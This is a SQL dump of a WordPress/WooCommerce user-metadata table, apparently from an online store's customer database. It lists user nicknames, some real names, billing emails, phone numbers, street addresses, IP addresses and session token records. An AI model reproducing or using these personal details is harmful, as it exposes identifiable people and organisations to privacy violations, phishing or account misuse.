INSERT INTO `wp_usermeta` VALUES (7437, 442, 'session_tokens', 'a:1:{s:64:"40981716ef838f29435339a93792d25e58974bc91eb0278b3bd8c1b25954b69b";a:4:{s:10:"expiration";i:1487995789;s:2:"ip";s:13:"115.87.121.46";s:2:"ua";s:128:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393";s:5:"login";i:1486786189;}}'); 
INSERT INTO `wp_usermeta` VALUES (7438, 442, 'billing_first_name', 'TECKTHAI'); 
INSERT INTO `wp_usermeta` VALUES (7439, 442, 'billing_last_name', 'GROUP'); 
INSERT INTO `wp_usermeta` VALUES (7440, 442, 'billing_company', 'TECK THAI JEWELRY SEPPLY'); 
INSERT INTO `wp_usermeta` VALUES (7441, 442, 'billing_email', 'inof@teckthai.com'); 
INSERT INTO `wp_usermeta` VALUES (7442, 442, 'billing_phone', '(662) 2260055'); 
INSERT INTO `wp_usermeta` VALUES (7443, 442, 'billing_country', 'TH'); 
INSERT INTO `wp_usermeta` VALUES (7444, 442, 'billing_address_1', '22/6-9 CHAROENKRUNG ROAD,'); 
INSERT INTO `wp_usermeta` VALUES (7445, 442, 'billing_address_2', 'WANGBURAPAPIROM'); 
INSERT INTO `wp_usermeta` VALUES (7446, 442, 'billing_city', 'PRANAKORN'); 
INSERT INTO `wp_usermeta` VALUES (7447, 442, 'billing_state', 'TH-10'); 
INSERT INTO `wp_usermeta` VALUES (7448, 442, 'billing_postcode', '10200'); 
INSERT INTO `wp_usermeta` VALUES (7449, 443, 'nickname', 'jiwson'); 
INSERT INTO `wp_usermeta` VALUES (7450, 443, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7451, 443, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7452, 443, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7453, 443, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7454, 443, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7455, 443, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7456, 443, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7457, 443, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7458, 443, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7459, 443, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7460, 443, '_yoast_wpseo_profile_updated', '1486962567'); 
INSERT INTO `wp_usermeta` VALUES (7461, 443, 'session_tokens', 'a:1:{s:64:"3382dda4e88ae06fae9444353dee8350c08b85e19003d6909f4e5be880d11a41";a:4:{s:10:"expiration";i:1488172168;s:2:"ip";s:14:"210.105.10.212";s:2:"ua";s:81:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; TCO_20170213140402; rv:11.0) like Gecko";s:5:"login";i:1486962568;}}'); 
INSERT INTO `wp_usermeta` VALUES (7462, 444, 'nickname', 'lauraelizabeth2'); 
INSERT INTO `wp_usermeta` VALUES (7463, 444, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7464, 444, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7465, 444, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7466, 444, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7467, 444, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7468, 444, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7469, 444, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7470, 444, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7471, 444, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7472, 444, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7473, 444, '_yoast_wpseo_profile_updated', '1486992677'); 
INSERT INTO `wp_usermeta` VALUES (7474, 444, 'session_tokens', 'a:1:{s:64:"52723aabe84b11b5b1c11f21803c92e90b1ec4b46503c9e131bddbd83b3e9ac9";a:4:{s:10:"expiration";i:1488202278;s:2:"ip";s:15:"199.114.205.111";s:2:"ua";s:101:"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1486992678;}}'); 
INSERT INTO `wp_usermeta` VALUES (7475, 445, 'nickname', 'amanda.oswalt'); 
INSERT INTO `wp_usermeta` VALUES (7476, 445, 'first_name', 'Amanda'); 
INSERT INTO `wp_usermeta` VALUES (7477, 445, 'last_name', 'Oswalt'); 
INSERT INTO `wp_usermeta` VALUES (7478, 445, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7479, 445, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7480, 445, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7481, 445, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7482, 445, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7483, 445, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7484, 445, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7485, 445, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7486, 445, '_yoast_wpseo_profile_updated', '1487010067'); 
INSERT INTO `wp_usermeta` VALUES (7487, 445, 'session_tokens', 'a:1:{s:64:"aff850e6aab3ef437e9f6a86a0f0256569e5f1dfaa6d4d704da2f6695149558b";a:4:{s:10:"expiration";i:1488463486;s:2:"ip";s:14:"199.46.196.144";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1488290686;}}'); 
INSERT INTO `wp_usermeta` VALUES (7488, 445, 'last_update', '1487010141'); 
INSERT INTO `wp_usermeta` VALUES (7489, 446, 'nickname', 'jerry.groves'); 
INSERT INTO `wp_usermeta` VALUES (7490, 446, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7491, 446, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7492, 446, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7493, 446, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7494, 446, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7495, 446, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7496, 446, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7497, 446, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7498, 446, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7499, 446, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7500, 446, '_yoast_wpseo_profile_updated', '1487015175'); 
INSERT INTO `wp_usermeta` VALUES (7501, 446, 'session_tokens', 'a:1:{s:64:"7462e6c860a80c97bde5abc130a9ccfbd5de69c26f469863d25dd5a945215929";a:4:{s:10:"expiration";i:1489265430;s:2:"ip";s:14:"104.129.204.76";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1489092630;}}'); 
INSERT INTO `wp_usermeta` VALUES (7502, 447, 'nickname', 'jennifer.y.datz'); 
INSERT INTO `wp_usermeta` VALUES (7503, 447, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7504, 447, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7505, 447, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7506, 447, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7507, 447, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7508, 447, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7509, 447, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7510, 447, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7511, 447, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7512, 447, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7513, 447, '_yoast_wpseo_profile_updated', '1487015836'); 
INSERT INTO `wp_usermeta` VALUES (7514, 447, 'session_tokens', 'a:1:{s:64:"2c64aa8300ce95d2a9ba5e967b2b13586c2d6c32ef2426379fc18f47a2e11678";a:4:{s:10:"expiration";i:1488225437;s:2:"ip";s:13:"163.206.121.2";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1487015837;}}'); 
INSERT INTO `wp_usermeta` VALUES (7515, 447, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (7516, 448, 'nickname', 'dchapman'); 
INSERT INTO `wp_usermeta` VALUES (7517, 448, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7518, 448, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7519, 448, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7520, 448, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7521, 448, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7522, 448, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7523, 448, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7524, 448, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7525, 448, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7526, 448, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7527, 448, '_yoast_wpseo_profile_updated', '1487017384'); 
INSERT INTO `wp_usermeta` VALUES (7528, 448, 'session_tokens', 'a:1:{s:64:"a5e7eb8a0b4aace0554aa97115bafbe15bd25ef08af8f444d25570150f3962d4";a:4:{s:10:"expiration";i:1488226985;s:2:"ip";s:13:"74.94.107.179";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1487017385;}}'); 
INSERT INTO `wp_usermeta` VALUES (7529, 449, 'nickname', 'marvin.rosenberry'); 
INSERT INTO `wp_usermeta` VALUES (7530, 449, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7531, 449, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7532, 449, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7533, 449, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7534, 449, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7535, 449, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7536, 449, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7537, 449, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7538, 449, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7539, 449, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7540, 449, '_yoast_wpseo_profile_updated', '1487077650'); 
INSERT INTO `wp_usermeta` VALUES (7541, 449, 'session_tokens', 'a:1:{s:64:"1805ed0895b1d7163a86f9f9157b111a64fd0546223ace868775c64c6e911480";a:4:{s:10:"expiration";i:1488287251;s:2:"ip";s:13:"208.17.195.11";s:2:"ua";s:61:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1487077651;}}'); 
INSERT INTO `wp_usermeta` VALUES (7542, 449, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (7543, 450, 'nickname', 'tresor.dzon-okogampio'); 
INSERT INTO `wp_usermeta` VALUES (7544, 450, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7545, 450, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7546, 450, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7547, 450, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7548, 450, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7549, 450, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7550, 450, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7551, 450, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7552, 450, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7553, 450, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7554, 450, '_yoast_wpseo_profile_updated', '1487081191'); 
INSERT INTO `wp_usermeta` VALUES (7555, 450, 'session_tokens', 'a:1:{s:64:"4d0569794d6c122b29a3ccd21a3ad43d0df9a5dd0b58677760a05c2aa1194b11";a:4:{s:10:"expiration";i:1488290792;s:2:"ip";s:15:"197.149.138.172";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36";s:5:"login";i:1487081192;}}'); 
INSERT INTO `wp_usermeta` VALUES (7556, 450, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (7557, 451, 'nickname', 'tchampoux'); 
INSERT INTO `wp_usermeta` VALUES (7558, 451, 'first_name', 'Tim'); 
INSERT INTO `wp_usermeta` VALUES (7559, 451, 'last_name', 'Champoux'); 
INSERT INTO `wp_usermeta` VALUES (7560, 451, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7561, 451, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7562, 451, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7563, 451, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7564, 451, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7565, 451, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7566, 451, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7567, 451, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7568, 451, '_yoast_wpseo_profile_updated', '1487108292'); 
INSERT INTO `wp_usermeta` VALUES (7569, 451, 'session_tokens', 'a:2:{s:64:"93d37f0edf1b4c86524aeea9fef76564cb1942ad70865c0999fd47277945c853";a:4:{s:10:"expiration";i:1488317893;s:2:"ip";s:15:"134.121.224.109";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0";s:5:"login";i:1487108293;}s:64:"124dc47acaa6b17ddef5c1cc366e942fd9ed209eaa5fce686af8dac99617584c";a:4:{s:10:"expiration";i:1487284648;s:2:"ip";s:15:"134.121.224.109";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1487111848;}}'); 
INSERT INTO `wp_usermeta` VALUES (7570, 451, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (7571, 451, 'billing_first_name', 'Tim'); 
INSERT INTO `wp_usermeta` VALUES (7572, 451, 'billing_last_name', 'Champoux'); 
INSERT INTO `wp_usermeta` VALUES (7573, 451, 'billing_company', 'Washington State University - University Stores'); 
INSERT INTO `wp_usermeta` VALUES (7574, 451, 'billing_email', 'tchampoux@wsu.edu'); 
INSERT INTO `wp_usermeta` VALUES (7575, 451, 'billing_phone', '509-335-4585'); 
INSERT INTO `wp_usermeta` VALUES (7576, 451, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (7577, 451, 'billing_address_1', '410 SE Dairy Road'); 
INSERT INTO `wp_usermeta` VALUES (7578, 451, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (7579, 451, 'billing_city', 'Pullman'); 
INSERT INTO `wp_usermeta` VALUES (7580, 451, 'billing_state', 'WA'); 
INSERT INTO `wp_usermeta` VALUES (7581, 451, 'billing_postcode', '99164'); 
INSERT INTO `wp_usermeta` VALUES (7582, 451, 'last_update', '1487112015'); 
INSERT INTO `wp_usermeta` VALUES (7583, 452, 'nickname', 'j.baxter'); 
INSERT INTO `wp_usermeta` VALUES (7584, 452, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7585, 452, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7586, 452, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7587, 452, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7588, 452, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7589, 452, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7590, 452, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7591, 452, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7592, 452, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7593, 452, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7594, 452, '_yoast_wpseo_profile_updated', '1487124785'); 
INSERT INTO `wp_usermeta` VALUES (7595, 452, 'session_tokens', 'a:1:{s:64:"4c3a35440b35e146a5f4b4c5c5ca173490d4ebce582003213daaea2a026df0ee";a:4:{s:10:"expiration";i:1488334386;s:2:"ip";s:14:"131.236.53.208";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1487124786;}}'); 
INSERT INTO `wp_usermeta` VALUES (7596, 453, 'nickname', 'ARangaswamy'); 
INSERT INTO `wp_usermeta` VALUES (7597, 453, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7598, 453, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7599, 453, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7600, 453, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7601, 453, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7602, 453, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7603, 453, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7604, 453, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7605, 453, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7606, 453, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7607, 453, '_yoast_wpseo_profile_updated', '1487152688'); 
INSERT INTO `wp_usermeta` VALUES (7608, 453, 'session_tokens', 'a:2:{s:64:"cf0b7d30b12879d961ed8855659e037aa1c90cc7532a379ce77e899ce063aeb0";a:4:{s:10:"expiration";i:1488362290;s:2:"ip";s:12:"219.65.67.26";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1487152690;}s:64:"1f16ff8ea57a8e434ef950b4dfcf9779374c0f52b2937487d630475a8c9e1275";a:4:{s:10:"expiration";i:1487325512;s:2:"ip";s:12:"219.65.67.26";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1487152712;}}'); 
INSERT INTO `wp_usermeta` VALUES (7609, 454, 'nickname', 'Carriec'); 
INSERT INTO `wp_usermeta` VALUES (7610, 454, 'first_name', 'Carrie'); 
INSERT INTO `wp_usermeta` VALUES (7611, 454, 'last_name', 'Charron'); 
INSERT INTO `wp_usermeta` VALUES (7612, 454, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7613, 454, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7614, 454, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7615, 454, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7616, 454, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7617, 454, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7618, 454, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7619, 454, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7620, 454, '_yoast_wpseo_profile_updated', '1487170368'); 
INSERT INTO `wp_usermeta` VALUES (7621, 454, 'session_tokens', 'a:1:{s:64:"773a51d636c3d0983da303b65c8d31c714e35a140fbd8a16bfcb7e228cc18d5b";a:4:{s:10:"expiration";i:1488379969;s:2:"ip";s:10:"71.83.3.82";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1487170369;}}'); 
INSERT INTO `wp_usermeta` VALUES (7622, 454, 'last_update', '1487170402'); 
INSERT INTO `wp_usermeta` VALUES (7623, 454, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (7624, 437, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (7625, 455, 'nickname', 'andy.johnson'); 
INSERT INTO `wp_usermeta` VALUES (7626, 455, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7627, 455, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7628, 455, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7629, 455, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7630, 455, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7631, 455, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7632, 455, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7633, 455, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7634, 455, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7635, 455, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7636, 455, '_yoast_wpseo_profile_updated', '1487180912'); 
INSERT INTO `wp_usermeta` VALUES (7637, 455, 'session_tokens', 'a:1:{s:64:"6b46c1d5ef81448bc69c20a30a648ed42d777def84748b9bf52ae44cb8785213";a:4:{s:10:"expiration";i:1488390513;s:2:"ip";s:14:"208.87.234.201";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1487180913;}}'); 
INSERT INTO `wp_usermeta` VALUES (7638, 456, 'nickname', 'mtruesdale'); 
INSERT INTO `wp_usermeta` VALUES (7639, 456, 'first_name', 'Mark'); 
INSERT INTO `wp_usermeta` VALUES (7640, 456, 'last_name', 'Truesdale'); 
INSERT INTO `wp_usermeta` VALUES (7641, 456, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7642, 456, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7643, 456, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7644, 456, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7645, 456, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7646, 456, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7647, 456, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7648, 456, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7649, 456, '_yoast_wpseo_profile_updated', '1487182216'); 
INSERT INTO `wp_usermeta` VALUES (7650, 456, 'session_tokens', 'a:1:{s:64:"09b39d4151ece942ab6692f5d75ba8390253006a64e922a79d0e103e8d9fae46";a:4:{s:10:"expiration";i:1491396402;s:2:"ip";s:13:"64.179.215.65";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1491223602;}}'); 
INSERT INTO `wp_usermeta` VALUES (7651, 457, 'nickname', 'sales1'); 
INSERT INTO `wp_usermeta` VALUES (7652, 457, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7653, 457, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7654, 457, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7655, 457, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7656, 457, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7657, 457, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7658, 457, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7659, 457, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7660, 457, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7661, 457, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7662, 457, '_yoast_wpseo_profile_updated', '1487183993'); 
INSERT INTO `wp_usermeta` VALUES (7663, 457, 'session_tokens', 'a:1:{s:64:"d9871c9954b649f516a7de34ee64f86611c7a4d71fbb25408da2ccc318172310";a:4:{s:10:"expiration";i:1488393593;s:2:"ip";s:13:"72.45.252.100";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1487183993;}}'); 
INSERT INTO `wp_usermeta` VALUES (7665, 455, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (7666, 458, 'nickname', 'martin.o.landry'); 
INSERT INTO `wp_usermeta` VALUES (7667, 458, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7668, 458, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7669, 458, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7670, 458, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7671, 458, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7672, 458, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7673, 458, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7674, 458, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7675, 458, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7676, 458, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7677, 458, '_yoast_wpseo_profile_updated', '1487196571'); 
INSERT INTO `wp_usermeta` VALUES (7678, 458, 'session_tokens', 'a:1:{s:64:"7dcd1e434539c319ce3af998daa927137af1f89cf9e6fb8c2c33cb29d8138a45";a:4:{s:10:"expiration";i:1488406172;s:2:"ip";s:13:"206.48.245.36";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1487196572;}}'); 
INSERT INTO `wp_usermeta` VALUES (7679, 459, 'nickname', 'marcia.l.taleff'); 
INSERT INTO `wp_usermeta` VALUES (7680, 459, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7681, 459, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7682, 459, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7683, 459, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7684, 459, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7685, 459, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7686, 459, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7687, 459, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7688, 459, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7689, 459, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7690, 459, '_yoast_wpseo_profile_updated', '1487202461'); 
